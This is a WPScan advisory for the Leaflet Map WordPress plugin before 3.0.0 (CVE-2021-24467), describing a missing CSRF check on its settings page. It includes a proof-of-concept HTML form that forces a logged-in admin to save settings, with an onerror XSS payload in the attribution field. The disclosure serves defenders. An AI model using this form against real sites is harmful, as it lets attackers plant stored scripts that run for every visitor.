WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Leaflet Map < 3.0.0 - Arbitrary Settings Update via CSRF Leading to Stored XSS

Description

The plugin does not verify the CSRF nonce when saving its settings, which allows attackers to make a logged in admin update the settings via a Cross-Site Request Forgery attack. This could lead to Cross-Site Scripting issues by either changing the URL of the JavaScript library being used, or using malicious attributions which will be executed in all page with an embed map from the plugin

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/[email protected]/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/[email protected]/dist/leaflet.css" />
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/[email protected]/togeojson.js" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

leaflet-map
Fixed in version 3.0.0

References

CVE
CVE-2021-24467

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
ac32d265-066e-49ec-9042-3145cd99e2e8

Timeline

Publicly Published

2021-07-01 (about 1 years ago)

Added

2021-07-07 (about 1 years ago)

Last Updated

2022-02-13 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin